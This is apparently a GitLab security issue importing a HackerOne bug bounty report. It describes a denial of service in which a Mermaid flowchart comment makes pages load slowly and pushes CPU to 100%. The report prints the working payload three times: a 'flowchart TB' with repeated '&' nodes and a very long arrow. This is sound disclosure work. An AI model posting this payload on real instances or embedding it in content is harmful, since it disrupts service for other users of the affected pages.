DOS via Flowchart TB Mermaid

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2137421 by toukakirishima on 2023-09-06, assigned to @ottilia_westerlund:

Report | Attachments | How To Reproduce

Report

Summary

I found a DOS vulnerability when add comment with Flowchart TB Mermaid, as an attacker I can make DoS in any section with comments (Issues, Merge requests, Milestones, Snippets, Wiki pages, Markdown documents inside repositories, Epics). And it takes a while to load, and uses 100% CPU.

My specification :
RAM : 40 GB
CPU : 12 CPUs 3.6 GHz AMD Ryzen 5 2600X
Browser : Mozilla Firefox & Google Chrome (Latest Version)

Steps to reproduce

1. Create comment with Flowchart TB Mermaid (example on Issue)

Payload :

flowchart TB  
    A & A & A & A & A & A & A & A ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------->  C & D & E & F & G & H & I & J & K & L & M & N & O & P & Q & R & S & T & U & V & W & X & Y & Z

flowchart TB  
    A & A & A & A & A & A & A & A ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------->  C & D & E & F & G & H & I & J & K & L & M & N & O & P & Q & R & S & T & U & V & W & X & Y & Z

flowchart TB  
    A & A & A & A & A & A & A & A ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------->  C & D & E & F & G & H & I & J & K & L & M & N & O & P & Q & R & S & T & U & V & W & X & Y & Z  

2. Reload the page. And you will load the page very long.

POC

bandicam_2023-09-06_14-54-12-196.mp4

Output of checks

This bug happens on GitLab.com

Impact

Attacker can make DoS in any section with comments (Issues, Merge requests, Milestones, Snippets, Wiki pages, Markdown documents inside repositories, Epics).

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• image.png
• image.png
• bandicam_2023-09-06_14-54-12-196.mp4

How To Reproduce

Please add reproducibility information to this section: